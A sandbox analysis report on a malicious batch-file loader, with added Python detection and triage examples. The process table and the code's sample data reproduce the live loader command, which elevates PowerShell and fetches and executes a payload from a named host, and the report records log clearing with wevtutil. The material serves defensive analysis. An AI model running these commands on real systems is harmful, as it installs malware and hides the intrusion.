File name: new.bat

Full analysis: https://app.any.run/tasks/84a1ec87-93b0-48f8-a27e-25aff7c525b0
Verdict: Malicious activity
Threats: loader

A loader is malicious software whose job is to get onto a device and deliver further payloads. Once running, it can profile the host and install other malware, such as trojans or stealers. Loaders are usually delivered through phishing emails and links, relying on social engineering to get the user to download and run them, and they use evasion and persistence techniques to avoid detection.

Analysis date: April 06, 2026, 16:46:50
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
powershell
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: 456D029DEB1E82DF95CADF730B24917D
SHA1: 0DEC5C9D79EF99A03E9750B46560EE2B2E67A48C
SHA256: B45DB83F8EC065535E7E50F7EE0F0D88B70524DCDB7EF326D4E7C0CAFC68B151
SSDEEP: 6:hyJs0MFnIk/FS3S2ijPeanSTd3fILVfGGb:UJFMRIk/FS3S2imh8VfZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Loader pattern has been found
      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)
    • Dynamically loads an assembly (POWERSHELL)
      • powershell.exe (PID: 8040)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • cmd.exe (PID: 7256)
    • Starts process via Powershell
      • powershell.exe (PID: 1068)
    • Starts POWERSHELL.EXE for commands execution
      • cmd.exe (PID: 7256)
      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)
    • Application launched itself
      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)
    • Gets or sets the security protocol (POWERSHELL)
      • powershell.exe (PID: 8040)
    • Checks a user's role membership (POWERSHELL)
      • powershell.exe (PID: 8040)
    • CSC.EXE is used to compile C# code
      • csc.exe (PID: 8100)
      • csc.exe (PID: 8264)
    • Executable content was dropped or overwritten
      • csc.exe (PID: 8100)
      • powershell.exe (PID: 8040)
      • csc.exe (PID: 8264)
    • Uses WEVTUTIL.EXE to cleanup log
      • powershell.exe (PID: 8040)
  • INFO
    • Uses string replace method (POWERSHELL)
      • powershell.exe (PID: 8040)
    • Checks if a key exists in the options dictionary (POWERSHELL)
      • powershell.exe (PID: 8040)
    • Gets data length (POWERSHELL)
      • powershell.exe (PID: 8040)
    • Uses string split method (POWERSHELL)
      • powershell.exe (PID: 8040)
    • Checks supported languages
      • csc.exe (PID: 8100)
      • cvtres.exe (PID: 9028)
      • csc.exe (PID: 8264)
      • cvtres.exe (PID: 6848)
    • Reads the machine GUID from the registry
      • csc.exe (PID: 8100)
      • csc.exe (PID: 8264)
    • Create files in a temporary directory
      • csc.exe (PID: 8100)
      • cvtres.exe (PID: 9028)
      • cvtres.exe (PID: 6848)
      • csc.exe (PID: 8264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 163
Monitored processes: 17
Malicious processes: 3
Suspicious processes: 0

Behavior graph

Process nodes in graph order ("no specs" marks processes for which the report records no indicators):
cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe, conhost.exe (no specs), csc.exe, cvtres.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), winmgmt.exe (no specs), slui.exe (no specs), csc.exe, cvtres.exe (no specs), wevtutil.exe (no specs), conhost.exe (no specs)

Process information

Each entry below lists the PID, the command line (CMD), the image path, any indicators, and the parent process, followed by the process attributes and the loaded modules.
PID: 792
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: wevtutil.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1068
CMD: PowerShell -Command "Start-Process PowerShell -Verb RunAs -ArgumentList '-Command [System.Net.ServicePointManager]::SecurityProtocol = 3072; iex (Invoke-RestMethod https://antia.space/majestic)'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1840
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3168
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3240
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Activation Client; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3584
CMD: "powershell.exe" winmgmt /verifyrepository
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3796
CMD: "powershell.exe" Get-Service -Name winmgmt | Select-Object -ExpandProperty Status
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 4292
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Console Window Host; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5548
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5996
CMD: "C:\Windows\System32\wevtutil.exe" cl "Microsoft-Windows-PowerShell/Operational"
Path: C:\Windows\System32\wevtutil.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Eventing Command Line Utility; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\wevtutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
c:\windows\system32\sechost.dll
Total events: 23 446 (read: 23 445; write: 1; delete: 0)

Modification events

PID 8040 (powershell.exe), operation: write
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Name: ExecutionPolicy
Value: Unrestricted
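The chain the report records (cmd.exe, then powershell.exe relaunching itself with -Verb RunAs, an in-memory iex (Invoke-RestMethod ...) fetch, csc.exe compiling an assembly, the ExecutionPolicy write above, and finally wevtutil cl on the PowerShell Operational log) is what a detection engineer wants to match in process-creation telemetry. The Python below is an added example written for this page, not ANY.RUN code and not part of the report: it runs a few command-line rules and parent/child checks over constructed process-creation records whose command lines for PIDs 1068, 3584 and 5996 are copied from the process table (PID 8040's own command line is not shown in the report and is rebuilt from the -ArgumentList that PID 1068 passes to Start-Process), and it flags the ExecutionPolicy registry write. The Sysmon-style field names, the constructed parent/integrity values, and the ATT&CK mapping in RULES are the editor's assumptions.

```python
"""Triage rules for the process chain recorded in this report.

Added example (editor's code, not ANY.RUN's). Field names follow Sysmon
Event ID 1 (Image, CommandLine, ParentImage, IntegrityLevel); that choice of
telemetry source is an assumption, as is the ATT&CK mapping in RULES.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str
    integrity: str  # "Medium" / "High", as in the report's Integrity Level field


# Constructed sample telemetry. Command lines for PIDs 1068, 3584 and 5996 are
# copied from the report; PID 8040's line is not shown there and is rebuilt
# from the -ArgumentList that PID 1068 passes to Start-Process.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1068, POWERSHELL,
                 "PowerShell -Command \"Start-Process PowerShell -Verb RunAs "
                 "-ArgumentList '-Command [System.Net.ServicePointManager]"
                 "::SecurityProtocol = 3072; iex (Invoke-RestMethod "
                 "https://antia.space/majestic)'\"",
                 r"C:\Windows\System32\cmd.exe", "Medium"),
    ProcessEvent(8040, POWERSHELL,
                 f'"{POWERSHELL}" -Command [System.Net.ServicePointManager]'
                 "::SecurityProtocol = 3072; iex (Invoke-RestMethod "
                 "https://antia.space/majestic)",
                 POWERSHELL, "High"),
    ProcessEvent(3584, POWERSHELL, '"powershell.exe" winmgmt /verifyrepository',
                 POWERSHELL, "High"),
    ProcessEvent(5996, r"C:\Windows\System32\wevtutil.exe",
                 '"C:\\Windows\\System32\\wevtutil.exe" cl '
                 '"Microsoft-Windows-PowerShell/Operational"',
                 POWERSHELL, "High"),
]

# (rule name, ATT&CK technique or "info", pattern applied to the command line)
RULES = [
    ("in-memory download-and-execute", "T1059.001 / T1105",
     re.compile(r"\b(iex|invoke-expression)\b.*"
                r"\b(invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring)\b",
                re.I | re.S)),
    ("relaunch through an elevation prompt (Start-Process -Verb RunAs)", "info",
     re.compile(r"start-process\b.*-verb\s+runas\b", re.I | re.S)),
    ("TLS version pinned before the fetch (SecurityProtocol 3072 is Tls12)", "info",
     re.compile(r"servicepointmanager\]::securityprotocol\s*=", re.I)),
    ("event log cleared with wevtutil", "T1070.001",
     re.compile(r"wevtutil(\.exe)?\"?\s+(cl|clear-log)\b", re.I)),
]

# Stops at quotes and parentheses so the trailing )'" of PID 1068 is not captured.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def triage(events):
    """Return one hit dict per (event, rule) match, plus parent/child anomalies."""
    hits = []
    for ev in events:
        for name, technique, rx in RULES:
            if rx.search(ev.command_line):
                hits.append({"pid": ev.pid, "rule": name, "technique": technique,
                             "urls": URL_RE.findall(ev.command_line)})
        parent, child = _basename(ev.parent_image), _basename(ev.image)
        # powershell.exe driving the C# compiler or the event-log utility is the
        # Add-Type / log-clearing behaviour the report flags.
        if parent == "powershell.exe" and child in ("csc.exe", "wevtutil.exe"):
            hits.append({"pid": ev.pid, "rule": f"powershell.exe spawned {child}",
                         "technique": "info", "urls": []})
        # PowerShell spawning PowerShell at High integrity: the elevated relaunch.
        if parent == child == "powershell.exe" and ev.integrity.lower() == "high":
            hits.append({"pid": ev.pid,
                         "rule": "elevated powershell.exe child of powershell.exe",
                         "technique": "info", "urls": []})
    return hits


def stage2_urls(events):
    """URLs pulled from command lines that match the download-and-execute rule."""
    urls = set()
    for ev in events:
        if RULES[0][2].search(ev.command_line):
            urls.update(URL_RE.findall(ev.command_line))
    return sorted(urls)


def check_registry_write(key, name, value):
    """Flag the ExecutionPolicy relaxation recorded under Modification events."""
    if (name.lower() == "executionpolicy"
            and key.lower().endswith(r"\shellids\microsoft.powershell")
            and value.lower() in ("unrestricted", "bypass")):
        return f"ExecutionPolicy set to {value} under {key}"
    return None


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(h["pid"], h["technique"], h["rule"], h["urls"])
    print(stage2_urls(SAMPLE_EVENTS))
    print(check_registry_write(
        r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell",
        "ExecutionPolicy", "Unrestricted"))
```

The first rule is deliberately the only one that feeds stage2_urls: the URL worth blocking is the one handed to iex, which here resolves to the antia.space host the network section marks malicious. The wevtutil rule is the one to page on, because an elevated PowerShell clearing its own Operational log is not something administrative scripts do; the two "info" rules are context that lets an analyst rebuild the chain when the log has in fact been cleared.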
Executable files: 13
Suspicious files: 9
Text files: 18
Unknown types: 0

Dropped files

Each entry lists the writing PID and process, the filename and type, then the file hashes.

PID 8040, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3f4faeem.ekl.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 8100, csc.exe: C:\Users\admin\AppData\Local\Temp\0rbsxgkr\0rbsxgkr.dll (executable)
MD5: 8A593DC037F95E1E2985C6AF88003040
SHA256: E9DBAF674AC14FEF04D41D222D78E6925B5F944ED7F4B15ABD3DED033EE2F6E6

PID 1068, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nan305dq.vsv.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 1068, powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
MD5: E89F0DE47250FAF418F71CBC5DFE8D90
SHA256: 2B13E7CFD186DB04765AB5A1517770A10865B626968510C7E03D78F4020D36AC

PID 1068, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_njumo0mh.d4d.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 8040, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A981Q12VGQU59U7V7OTD.temp (binary)
MD5: 1A26EAED296242DF450FE7D59CAB823E
SHA256: 5E182062925D7AA40964000267D5A673EF96C9F3309C5C461151C1AF5CBB7C09

PID 8040, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e5ad0.TMP (binary)
MD5: 00A03B286E6E0EBFF8D9C492365D5EC2
SHA256: 4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615

PID 8040, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (binary)
MD5: 1A26EAED296242DF450FE7D59CAB823E
SHA256: 5E182062925D7AA40964000267D5A673EF96C9F3309C5C461151C1AF5CBB7C09

PID 8040, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzkxri0i.5bg.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 8040, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tcafhtia.qr2.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
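Most rows in the dropped-files table are PowerShell housekeeping rather than payload: the __PSScriptPolicyTest_* files all carry the same hash because PowerShell writes a fixed test script to %TEMP% to probe AppLocker/WDAC lockdown, StartupProfileData-NonInteractive is a profile cache, and the CustomDestinations entries are Explorer jump lists. The one file that matters is the assembly csc.exe wrote to a randomly named %TEMP% subfolder, the on-disk trace of the "Dynamically loads an assembly" and "CSC.EXE is used to compile C# code" signatures. The following Python is an added example from the editor, not ANY.RUN code; it applies that classification to constructed rows copied from the table above so the payload is separated from the noise. The path patterns and the labels are the editor's assumptions.

```python
"""Noise filter for the "Dropped files" table of this report.

Added example (editor's code, not ANY.RUN's). The classification rules are the
editor's: PowerShell writes __PSScriptPolicyTest_* files to %TEMP% to probe
AppLocker/WDAC lockdown, Add-Type drives csc.exe to compile into a randomly
named %TEMP% subfolder, and CustomDestinations files are Explorer jump lists.
"""
import re
from dataclasses import dataclass


@dataclass
class DroppedFile:
    pid: int
    process: str
    path: str
    kind: str   # the report's Type column
    md5: str


# Constructed from rows of the report's table (paths and hashes copied as shown).
DROPPED = [
    DroppedFile(8040, "powershell.exe",
                r"C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3f4faeem.ekl.ps1",
                "text", "D17FE0A3F47BE24A6453E9EF58C94641"),
    DroppedFile(8100, "csc.exe",
                r"C:\Users\admin\AppData\Local\Temp\0rbsxgkr\0rbsxgkr.dll",
                "executable", "8A593DC037F95E1E2985C6AF88003040"),
    DroppedFile(1068, "powershell.exe",
                r"C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nan305dq.vsv.psm1",
                "text", "D17FE0A3F47BE24A6453E9EF58C94641"),
    DroppedFile(1068, "powershell.exe",
                r"C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive",
                "binary", "E89F0DE47250FAF418F71CBC5DFE8D90"),
    DroppedFile(8040, "powershell.exe",
                r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms",
                "binary", "1A26EAED296242DF450FE7D59CAB823E"),
]

PS_POLICY_TEST = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.psm?1$", re.I)
PS_PROFILE_CACHE = re.compile(r"\\PowerShell\\StartupProfileData-", re.I)
JUMP_LIST = re.compile(r"\\Recent\\CustomDestinations\\", re.I)
# csc.exe output for Add-Type: %TEMP%\<name>\<name>.dll with the same random name.
ADD_TYPE_OUTPUT = re.compile(r"\\Temp\\(?P<name>[a-z0-9]{8})\\(?P=name)\.(dll|exe)$", re.I)


def classify(f):
    """Return 'noise: ...', 'interesting: ...' or 'review' for one dropped file."""
    if PS_POLICY_TEST.search(f.path):
        return "noise: PowerShell AppLocker/WDAC policy probe"
    if PS_PROFILE_CACHE.search(f.path):
        return "noise: PowerShell startup profile cache"
    if JUMP_LIST.search(f.path):
        return "noise: Explorer jump list"
    if f.process.lower() == "csc.exe" and ADD_TYPE_OUTPUT.search(f.path):
        return "interesting: assembly compiled by Add-Type, pull it and inspect"
    if f.kind == "executable":
        return "interesting: executable written to disk"
    return "review"


def interesting(files):
    return [f for f in files if classify(f).startswith("interesting")]


def pivot_hashes(files):
    """Hashes worth searching for on other hosts (noise files share fixed hashes)."""
    return sorted({f.md5 for f in interesting(files)})


def policy_probe_hashes(files):
    """MD5s seen on __PSScriptPolicyTest files; a single value means one fixed body."""
    return sorted({f.md5 for f in files if PS_POLICY_TEST.search(f.path)})


if __name__ == "__main__":
    for f in DROPPED:
        print(f.pid, f.process, classify(f), f.path)
    print("pivot on:", pivot_hashes(DROPPED))
```

The pivot list is the point: the policy-test hash appears on every PowerShell host and would flood a hunt, while the csc.exe output hash is specific to this run and is what to search for across the estate. The compiled name is random per execution, so hunt on the path shape (%TEMP%\<8 chars>\<same 8 chars>.dll written by csc.exe with a PowerShell grandparent) rather than on the name itself.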
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 43
TCP/UDP connections: 22
DNS requests: 16
Threats: 7

HTTP requests

Columns: PID and process | method and HTTP code | IP:port | URL | CN | type and size | reputation

PID 8040 powershell.exe | GET 200 | 66.151.34.51:443 | https://antia.space/majestic | NL | binary, 73.7 Kb | malicious
PID 356 svchost.exe | POST 200 | 40.126.32.136:443 | https://login.live.com/RST2.srf | US | xml, 1.24 Kb | whitelisted
PID 356 svchost.exe | GET 200 | 23.11.41.157:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D | NL | binary, 471 b | whitelisted
PID 356 svchost.exe | POST 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text, 203 b | whitelisted
PID 8040 powershell.exe | GET (no HTTP code or size recorded) | 66.151.34.51:443 | https://antia.space/majestic/OpenCvSharpExtern.dll | NL | unknown
PID 356 svchost.exe | POST 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text, 203 b | whitelisted
PID 356 svchost.exe | POST 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text, 203 b | whitelisted
PID 6768 MoUsoCoreWorker.exe | GET 304 | 51.104.136.2:443 | https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop | US | whitelisted
PID 356 svchost.exe | POST 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text, 203 b | whitelisted
PID 2328 svchost.exe | GET 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary, 825 b | whitelisted

Connections

Columns: PID and process | IP:port | domain | ASN | CN | reputation

PID 2328 svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
PID 4 System | 192.168.100.255:137 | Not routed | whitelisted
PID 7244 RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
PID 6768 MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
PID 3412 svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
PID 4 System | 192.168.100.255:138 | Not routed | whitelisted
PID 8040 powershell.exe | 66.151.34.51:443 | antia.space | HOSTKEY-AS | NL | malicious
PID 356 svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
PID 356 svchost.exe | 23.11.41.157:80 | ocsp.digicert.com | AKAMAI-AMS | NL | whitelisted
PID 2328 svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain: resolved IPs (reputation)

settings-win.data.microsoft.com: 51.104.136.2, 20.73.194.208 (whitelisted)
self.events.data.microsoft.com: 20.42.65.88 (whitelisted)
google.com: 142.251.110.100, 142.251.110.102, 142.251.110.113, 142.251.110.139, 142.251.110.138, 142.251.110.101 (whitelisted)
client.wns.windows.com: 172.211.123.248 (whitelisted)
antia.space: 66.151.34.51 (unknown)
login.live.com: 40.126.32.136, 20.190.160.5, 40.126.32.140, 20.190.160.4, 40.126.32.76, 20.190.160.2, 40.126.32.74, 20.190.160.128 (whitelisted)
ocsp.digicert.com: 23.11.41.157 (whitelisted)
crl.microsoft.com: 2.16.164.120, 2.16.164.49 (whitelisted)
www.microsoft.com: 23.52.181.212 (whitelisted)
slscr.update.microsoft.com: 135.233.95.144 (whitelisted)

Threats

Columns: PID and process | class | message

PID 8040 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
PID 8040 powershell.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
PID 8040 powershell.exe | Misc activity | SUSPICIOUS [ANY.RUN] The Principal.WindowsIdentity in PS.Script has been detected
PID 2328 svchost.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
PID 8040 powershell.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] PowerShell script with IWR/IEX chain in HTTP response
PID 8040 powershell.exe | A Network Trojan was detected | ET MALWARE Observed Spoofed WindowsPowerShell User-Agent
PID 8040 powershell.exe | A suspicious filename was detected | ET HUNTING HTTP GET Request for newtonsoft.json.dll - Possible Infostealer Activity
No debug info